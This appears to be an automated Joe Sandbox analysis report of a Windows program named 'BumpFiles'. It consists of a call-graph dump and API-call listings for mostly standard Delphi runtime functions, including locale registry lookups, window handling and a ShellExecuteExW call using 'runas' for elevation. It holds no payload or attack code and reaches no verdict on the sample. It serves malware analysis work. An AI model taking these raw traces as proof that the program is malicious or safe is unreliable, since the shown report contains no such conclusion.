40d609 12119->12121 12120 40d691 12120->12116 12121->12120 12137 40d324 12121->12137 12123 40d67e 12124 40d693 GetUserDefaultUILanguage 12123->12124 12125 40d684 12123->12125 12141 40ccd4 EnterCriticalSection 12124->12141 12126 40d450 2 API calls 12125->12126 12126->12120 12128 40d6a0 12161 40d450 12128->12161 12130 40d6ad 12131 40d6d5 12130->12131 12132 40d6bb GetSystemDefaultUILanguage 12130->12132 12131->12120 12165 40d51c 12131->12165 12133 40ccd4 17 API calls 12132->12133 12135 40d6c8 12133->12135 12136 40d450 2 API calls 12135->12136 12136->12131 12138 40d346 12137->12138 12140 40d350 12137->12140 12173 40d008 12138->12173 12140->12123 12142 40cd20 LeaveCriticalSection 12141->12142 12143 40cd00 12141->12143 12210 409d94 12142->12210 12146 40cd11 LeaveCriticalSection 12143->12146 12145 40cd31 IsValidLocale 12147 40cd40 12145->12147 12148 40cd8f EnterCriticalSection 12145->12148 12156 40cdc2 12146->12156 12150 40cd54 12147->12150 12151 40cd49 12147->12151 12149 40cda7 12148->12149 12157 40cdb8 LeaveCriticalSection 12149->12157 12225 40c9bc 12150->12225 12212 40cbb8 GetThreadUILanguage 12151->12212 12154 40cd52 12154->12148 12155 40cd5d GetSystemDefaultUILanguage 12155->12148 12158 40cd67 12155->12158 12156->12128 12157->12156 12159 40cd78 GetSystemDefaultUILanguage 12158->12159 12160 40c9bc 3 API calls 12159->12160 12160->12154 12163 40d46e 12161->12163 12162 40d4e9 12162->12130 12163->12162 12234 40d3e4 12163->12234 12239 409e78 12165->12239 12168 40d56c 12169 40d3e4 2 API calls 12168->12169 12170 40d580 12169->12170 12171 40d5ae 12170->12171 12172 40d3e4 2 API calls 12170->12172 12171->12120 12172->12171 12174 40d01f 12173->12174 12175 40d033 GetModuleFileNameW 12174->12175 12176 40d048 12174->12176 12175->12176 12177 40d070 RegOpenKeyExW 12176->12177 12182 40d217 12176->12182 12178 40d131 12177->12178 12179 40d097 RegOpenKeyExW 12177->12179 12194 40ce18 GetModuleHandleW 12178->12194 12179->12178 12180 40d0b5 RegOpenKeyExW 12179->12180 12180->12178 12183 40d0d3 RegOpenKeyExW 12180->12183 12182->12140 12183->12178 12185 40d0f1 RegOpenKeyExW 12183->12185 12184 40d14f RegQueryValueExW 12186 40d1a0 RegQueryValueExW 12184->12186 12189 40d16d 12184->12189 12185->12178 12188 40d10f RegOpenKeyExW 12185->12188 12187 40d1bc 12186->12187 12191 40d19e 12186->12191 12192 40d1c4 RegQueryValueExW 12187->12192 12188->12178 12188->12182 12190 40d175 RegQueryValueExW 12189->12190 12190->12191 12193 40d206 RegCloseKey 12191->12193 12192->12191 12193->12140 12195 40ce40 GetProcAddress 12194->12195 12196 40ce51 12194->12196 12195->12196 12197 40ce67 12196->12197 12202 40ceb3 12196->12202 12206 40cdf4 12196->12206 12197->12184 12200 40cdf4 CharNextW 12200->12202 12201 40cdf4 CharNextW 12201->12202 12202->12197 12202->12201 12203 40cf38 FindFirstFileW 12202->12203 12205 40cfa2 lstrlenW 12202->12205 12203->12197 12204 40cf54 FindClose lstrlenW 12203->12204 12204->12197 12204->12202 12205->12202 12208 40ce02 12206->12208 12207 40ce10 12207->12197 12207->12200 12208->12207 12209 40cdfa CharNextW 12208->12209 12209->12208 12211 409d9a 12210->12211 12211->12145 12213 40cbd4 12212->12213 12214 40cc2d 12212->12214 12230 40cb74 GetThreadPreferredUILanguages 12213->12230 12215 40cb74 2 API calls 12214->12215 12220 40cc35 12215->12220 12219 40cc7c SetThreadPreferredUILanguages 12221 40cb74 2 API calls 12219->12221 12220->12219 12224 40ccbd 12220->12224 12222 40cc92 12221->12222 12223 40ccad SetThreadPreferredUILanguages 12222->12223 12222->12224 12223->12224 12224->12154 12227 40c9f7 12225->12227 12226 40ca60 IsValidLocale 12228 40ca73 GetLocaleInfoW GetLocaleInfoW 12226->12228 12229 40caae 12226->12229 12227->12226 12227->12229 12228->12229 12229->12155 12231 40cb95 12230->12231 12232 40cbae SetThreadPreferredUILanguages 12230->12232 12233 40cb9e GetThreadPreferredUILanguages 12231->12233 12232->12214 12233->12232 12235 40d3f9 12234->12235 12236 40d416 FindFirstFileW 12235->12236 12237 40d426 FindClose 12236->12237 12238 40d42c 12236->12238 12237->12238 12238->12163 12240 409e7c GetUserDefaultUILanguage GetLocaleInfoW 12239->12240 12240->12168 12241 5edea4 PeekMessageW 12242 5edfa6 12241->12242 12243 5edec5 12241->12243 12244 5edecb IsWindowUnicode 12243->12244 12245 5eded5 12243->12245 12244->12245 12246 5edefc PeekMessageA 12245->12246 12247 5edee6 PeekMessageW 12245->12247 12248 5edf10 12246->12248 12247->12248 12248->12242 12249 5efd40 9 API calls 12248->12249 12250 5edf4b 12249->12250 12250->12242 12251 5edd38 121 API calls 12250->12251 12252 5edf58 12251->12252 12252->12242 12253 5edbf0 TranslateMDISysAccel 12252->12253 12254 5edf6b 12253->12254 12254->12242 12255 5edc40 15 API calls 12254->12255 12256 5edf78 12255->12256 12256->12242 12257 5edba8 3 API calls 12256->12257 12258 5edf85 12257->12258 12258->12242 12259 5edf89 TranslateMessage 12258->12259 12260 5edf9e DispatchMessageA 12259->12260 12261 5edf96 DispatchMessageW 12259->12261 12260->12242 12261->12242 12262 407cfb 12267 407c54 12262->12267 12264 407d1f 12265 407d40 CompareStringW 12264->12265 12266 407d61 12265->12266 12270 40f034 12267->12270 12273 40efa4 12270->12273 12272 407c66 12272->12264 12274 40efc5 12273->12274 12275 40ed58 MultiByteToWideChar 12274->12275 12276 40efeb 12274->12276 12275->12276 12276->12272 12277 63c7a8 12278 63c7b6 12277->12278 12290 5ee0e8 12278->12290 12280 63c7cf 12281 5ee0e8 10 API calls 12280->12281 12282 63c7e2 12281->12282 12283 5ee0e8 10 API calls 12282->12283 12284 63c7f5 12283->12284 12285 5ee0e8 10 API calls 12284->12285 12286 63c808 12285->12286 12296 5ee244 12286->12296 12288 5edfb8 128 API calls 12289 63c80f 12288->12289 12289->12288 12292 5ee102 12290->12292 12291 5ee203 12291->12280 12292->12291 12293 5ee1bd GetWindowLongW SetWindowLongW 12292->12293 12294 5ee1e5 12292->12294 12293->12294 12309 5e0e94 GetWindowLongW 12294->12309 12298 5ee270 12296->12298 12297 5ee33d 12297->12289 12298->12297 12302 5ee28b 12298->12302 12320 5e58f8 12298->12320 12300 5ee2f3 12300->12297 12301 5edfd0 128 API calls 12300->12301 12301->12300 12302->12300 12303 5ee2d4 12302->12303 12304 5ee2f5 12302->12304 12324 5ed634 12303->12324 12349 5e3dc8 12304->12349 12310 5e0ead 12309->12310 12311 5e0ecf IsIconic IsWindowVisible 12310->12311 12312 5e0f50 12310->12312 12313 5e0efa ShowWindow 12311->12313 12314 5e0f02 12311->12314 12312->12291 12313->12314 12315 5e0f06 SetWindowLongW 12314->12315 12316 5e0f17 SetWindowLongW 12314->12316 12317 5e0f26 12315->12317 12316->12317 12317->12312 12318 5e0f3e ShowWindow 12317->12318 12319 5e0f48 ShowWindow 12317->12319 12318->12312 12319->12312 12321 5e5933 12320->12321 12322 5e5906 12320->12322 12321->12302 12322->12321 12323 5e592d ShowWindow 12322->12323 12323->12321 12353 5e0e10 12324->12353 12326 5ed643 12336 5ed69e 12326->12336 12356 5ec898 12326->12356 12328 5ed652 12329 5ed65b SetActiveWindow 12328->12329 12330 5ed667 12328->12330 12329->12330 12359 5ecaf4 12330->12359 12332 5ed674 12333 5ed6af 12332->12333 12335 5ed67d 12332->12335 12334 5ef118 2 API calls 12333->12334 12341 5ed6bc 12334->12341 12335->12336 12374 5ef118 IsWindowEnabled 12335->12374 12336->12300 12346 5e90fc 12336->12346 12337 5ed72f 12377 5ebcc8 12337->12377 12341->12337 12343 5ed6d9 IsWindowEnabled 12341->12343 12342 5e58f8 ShowWindow 12342->12336 12343->12337 12344 5ed6e3 12343->12344 12345 5ed708 SetWindowPos DefWindowProcW 12344->12345 12345->12336 12347 5e3dc8 77 API calls 12346->12347 12348 5e9108 12347->12348 12348->12300 12350 5e3dee 12349->12350 12352 5e3dd8 12349->12352 12350->12352 12412 5e5938 12350->12412 12352->12300 12354 5e0e1e 12353->12354 12355 5e0e2b IsIconic 12353->12355 12354->12326 12355->12326 12385 5ec798 12356->12385 12360 5ecb10 12359->12360 12362 5ecbae 12359->12362 12361 5ecb18 12360->12361 12365 5ecbb9 12360->12365 12361->12362 12363 5ecb2c EnumWindows 12361->12363 12362->12332 12366 5ecb3d 12363->12366 12368 5ecb7f 12363->12368 12398 5ec9e8 GetWindow 12363->12398 12364 5ecc23 12364->12362 12367 4ae244 71 API calls 12364->12367 12365->12362 12365->12364 12370 5ecc0c ShowWindow 12365->12370 12366->12368 12373 5ecb68 ShowWindow 12366->12373 12371 5ecc46 ShowOwnedPopups 12367->12371 12368->12362 12369 4ae244 71 API calls 12368->12369 12372 5ecba2 ShowOwnedPopups 12369->12372 12370->12364 12370->12370 12371->12362 12371->12364 12372->12362 12372->12368 12373->12368 12373->12373 12375 5ef138 EnableWindow 12374->12375 12376 5ed694 12374->12376 12375->12376 12376->12342 12408 5ebc6c SystemParametersInfoW 12377->12408 12380 5ebce1 ShowWindow 12382 5ebcec 12380->12382 12383 5ebcf3 12380->12383 12411 5ebc9c SystemParametersInfoW 12382->12411 12383->12336 12386 5ec7ad 12385->12386 12387 5ec834 12385->12387 12386->12387 12388 5ec7b6 EnumWindows 12386->12388 12387->12328 12388->12387 12389 5ec7d6 GetWindow GetWindowLongW 12388->12389 12393 5ec6d4 12388->12393 12390 5ec7f3 12389->12390 12390->12387 12391 4ae244 71 API calls 12390->12391 12392 5ec828 SetWindowPos 12391->12392 12392->12387 12392->12390 12394 5ec6ee 12393->12394 12395 5ec71e GetWindow 12394->12395 12397 5ec736 12394->12397 12396 5ec72a GetWindowLongW 12395->12396 12395->12397 12396->12397 12399 5eca1e 12398->12399 12400 5eca05 12398->12400 12401 5eca23 GetCurrentProcessId 12399->12401 12400->12399 12402 5eca12 GetWindowThreadProcessId 12400->12402 12403 5eca2d 12401->12403 12402->12401 12404 5ecabc 12403->12404 12405 5eca7c IsWindowVisible 12403->12405 12405->12404 12406 5eca86 12405->12406 12407 40c0c0 25 API calls 12406->12407 12407->12404 12409 5ebc8b 12408->12409 12409->12380 12410 5ebc9c SystemParametersInfoW 12409->12410 12410->12380 12411->12383 12413 5e5cda 12412->12413 12414 5e5950 12412->12414 12413->12352 12414->12413 12415 5e597e 12414->12415 12416 5e5969 12414->12416 12418 5e59aa 12415->12418 12419 5e5995 12415->12419 12434 5e512c 12416->12434 12420 5e5976 12418->12420 12451 5ebec4 12418->12451 12421 5e512c 74 API calls 12419->12421 12423 5e512c 74 API calls 12420->12423 12421->12420 12424 5e59c5 12423->12424 12458 5eaac8 12424->12458 12426 5eaac8 GetSystemMetrics 12432 5e59d6 12426->12432 12427 5eaab4 71 API calls 12427->12432 12428 5ea5e8 GetMonitorInfoW 12428->12432 12429 5ea554 GetMonitorInfoW 12429->12432 12430 5ea5a0 GetMonitorInfoW 12430->12432 12431 5ea588 GetMonitorInfoW 12431->12432 12432->12413 12432->12426 12432->12427 12432->12428 12432->12429 12432->12430 12432->12431 12433 5ea56c GetMonitorInfoW 12432->12433 12433->12432 12461 53efec 12434->12461 12436 5e513d MonitorFromWindow 12437 5eaac8 GetSystemMetrics 12436->12437 12440 5e514f 12437->12440 12438 5e517e 12466 5ebe54 12438->12466 12440->12438 12444 5e516a 12440->12444 12463 5eaab4 12440->12463 12442 5e5188 12443 5eaac8 GetSystemMetrics 12442->12443 12448 5e5192 12443->12448 12445 5eaab4 71 API calls 12444->12445 12446 5e5176 12445->12446 12446->12420 12447 5eaab4 71 API calls 12447->12448 12448->12446 12448->12447 12449 5e51ad 12448->12449 12450 5eaab4 71 API calls 12449->12450 12450->12446 12473 5ebe74 12451->12473 12454 5ebee4 12454->12420 12455 5ebe54 72 API calls 12456 5ebede 12455->12456 12457 5ebe74 73 API calls 12456->12457 12457->12454 12459 5eaada 12458->12459 12460 5eaad2 GetSystemMetrics 12458->12460 12459->12432 12460->12432 12462 53eff6 12461->12462 12462->12436 12464 4ae244 71 API calls 12463->12464 12465 5eaac4 12464->12465 12465->12440 12469 5ebe1c 12466->12469 12470 5ebe42 EnumDisplayMonitors 12469->12470 12471 5ebe2c 12469->12471 12470->12442 12471->12470 12472 4ae244 71 API calls 12471->12472 12472->12471 12474 5eaac8 GetSystemMetrics 12473->12474 12476 5ebe87 12474->12476 12475 5eaab4 71 API calls 12475->12476 12476->12475 12478 5ebea7 12476->12478 12480 5ebeb4 12476->12480 12481 5ea614 GetMonitorInfoW 12476->12481 12479 5eaab4 71 API calls 12478->12479 12479->12480 12480->12454 12480->12455 12481->12476

                                                                    Executed Functions

                                                                    Function 00633718 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100synchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • ShellExecuteExW.SHELL32(?), ref: 006337C2
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00633830,?,00000000,00633855,?,?,?,?), ref: 006337D1
                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 006337F3
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00633805
                                                                    • CloseHandle.KERNEL32(?,00000001,?,00000000,000000FF,000004FF,00000001,?,00000000,000000FF,000004FF,?,000000FF,00000000,00633830), ref: 00633815
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Wait$CloseCodeExecuteExitHandleMultipleObjectObjectsProcessShellSingle
                                                                    • String ID: runas
                                                                    • API String ID: 1089270204-4000483414
                                                                    • Opcode ID: fbfe01764bf3bd133da6426b1707191181eb6e5d9c76948ec3c121628ac9f268
                                                                    • Instruction ID: cfef6ee1f5db3d8dbd30449f85d256f355e06a594c341b1f80d548b0f9f1c305
                                                                    • Opcode Fuzzy Hash: fbfe01764bf3bd133da6426b1707191181eb6e5d9c76948ec3c121628ac9f268
                                                                    • Instruction Fuzzy Hash: 36319EB1A04254DFDB01EF69D882A8ABBF9FF48310F50857AF801DB395D678DA41CB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D51C Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040D5DC,?,?), ref: 0040D54E
                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040D5DC,?,?), ref: 0040D557
                                                                      • Part of subcall function 0040D3E4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040D442,?,00000001), ref: 0040D417
                                                                      • Part of subcall function 0040D3E4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040D442,?,00000001), ref: 0040D427
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                    • String ID:
                                                                    • API String ID: 3216391948-0
                                                                    • Opcode ID: 6d985cf35389fe99b6aefce10a28e4a55a65cc63afe30c83d0da8f23af8a3727
                                                                    • Instruction ID: 8863e0a287c16cdc3c28c396c55d2e72c7f1b10b95ecf773108c4199bfcc3fe4
                                                                    • Opcode Fuzzy Hash: 6d985cf35389fe99b6aefce10a28e4a55a65cc63afe30c83d0da8f23af8a3727
                                                                    • Instruction Fuzzy Hash: 5A114870A002099BDB04EF95C892AAEB7B5EF48304F50447BF904B73D2DB389E058A59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D3E4 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 404 40d3e4-40d424 call 409e78 call 40a8a4 FindFirstFileW 409 40d426-40d427 FindClose 404->409 410 40d42c-40d441 call 409d94 404->410 409->410
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040D442,?,00000001), ref: 0040D417
                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040D442,?,00000001), ref: 0040D427
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 1110422f23eefb4f4ddb778a27eb06d711fe7b6b4b1944915767f1634bda9307
                                                                    • Instruction ID: d95ccfb9285443909eeab24cd5826697557166218ec92875eff56e639bb6d067
                                                                    • Opcode Fuzzy Hash: 1110422f23eefb4f4ddb778a27eb06d711fe7b6b4b1944915767f1634bda9307
                                                                    • Instruction Fuzzy Hash: 06F08271904644AECB50FBB5CC9299EB7ACEF483187E045B7B404F22D2EA3CAF14995D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D008 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D22D,?,?), ref: 0040D041
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D,?,?), ref: 0040D08A
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D,?,?), ref: 0040D0AC
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040D0CA
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040D0E8
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040D106
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040D124
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D), ref: 0040D164
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001), ref: 0040D18F
                                                                    • RegCloseKey.ADVAPI32(?,0040D217,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001,Software\Embarcadero\Locales), ref: 0040D20A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                    • API String ID: 2701450724-3496071916
                                                                    • Opcode ID: 671aabb344a02d4a21f5d1e96b5259cc6b85b314e7807c62b9a1e8afea213112
                                                                    • Instruction ID: 96a9666c888c6573c04f77d76a58949e2d0052d2a9ed3862a85dc5018720b54c
                                                                    • Opcode Fuzzy Hash: 671aabb344a02d4a21f5d1e96b5259cc6b85b314e7807c62b9a1e8afea213112
                                                                    • Instruction Fuzzy Hash: C5510275E80608BFEB10EAD5CC46FAF73BCEB58704F5044BABA04F61C1D6789A448A5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00410844 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 37 410844-4108de call 410cf4 call 410d04 call 410d14 call 410d24 * 3 50 4108e0-410903 RaiseException 37->50 51 410908-410915 37->51 52 410b18-410b1e 50->52 53 410917 51->53 54 41091a-41093a 51->54 53->54 55 41094d-410955 54->55 56 41093c-41094b call 410d34 54->56 58 410958-410961 55->58 56->58 60 410963-410973 58->60 61 41097a-41097c 58->61 60->61 73 410975 60->73 62 410982-410989 61->62 63 410a3e-410a48 61->63 67 410999-41099b 62->67 68 41098b-410997 62->68 64 410a58-410a5a 63->64 65 410a4a-410a56 63->65 71 410aa7-410aa9 64->71 72 410a5c-410a60 64->72 65->64 69 4109a8-4109aa 67->69 70 41099d-4109a6 LoadLibraryA 67->70 68->67 74 4109f7-410a03 call 410138 69->74 75 4109ac-4109bb GetLastError 69->75 70->69 80 410af1-410af4 71->80 81 410aab-410aba GetLastError 71->81 77 410a62-410a66 72->77 78 410a9b-410aa5 GetProcAddress 72->78 79 410af6-410afd 73->79 98 410a05-410a09 74->98 99 410a38-410a39 FreeLibrary 74->99 83 4109cb-4109cd 75->83 84 4109bd-4109c9 75->84 77->78 87 410a68-410a73 77->87 78->71 85 410b16 79->85 86 410aff-410b0e 79->86 80->79 89 410aca-410acc 81->89 90 410abc-410ac8 81->90 83->74 92 4109cf-4109f2 RaiseException 83->92 84->83 85->52 86->85 87->78 93 410a75-410a7b 87->93 89->80 91 410ace-410aee RaiseException 89->91 90->89 91->80 92->52 93->78 97 410a7d-410a8a 93->97 97->78 100 410a8c-410a97 97->100 98->63 101 410a0b-410a19 LocalAlloc 98->101 99->63 100->78 102 410a99 100->102 101->63 103 410a1b-410a36 101->103 102->80 103->63
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004108FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID: Lld$lld
                                                                    • API String ID: 3997070919-3762902296
                                                                    • Opcode ID: 607d2351983e50f33505caff717241c6807bb6ddee907fbd5a450f9bc46cac13
                                                                    • Instruction ID: 3f85bfe050b3ea984b5aeb894ecb8602a3e2b9af0aebbdfc5bfded10294532e9
                                                                    • Opcode Fuzzy Hash: 607d2351983e50f33505caff717241c6807bb6ddee907fbd5a450f9bc46cac13
                                                                    • Instruction Fuzzy Hash: 14A17DB5A003099FDB14CFE8D890BEEB7B5BF59314F14412AE505AB381DBB8A9C4CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040CCD4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000,00000000), ref: 0040CCF2
                                                                    • LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000), ref: 0040CD16
                                                                    • LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000), ref: 0040CD25
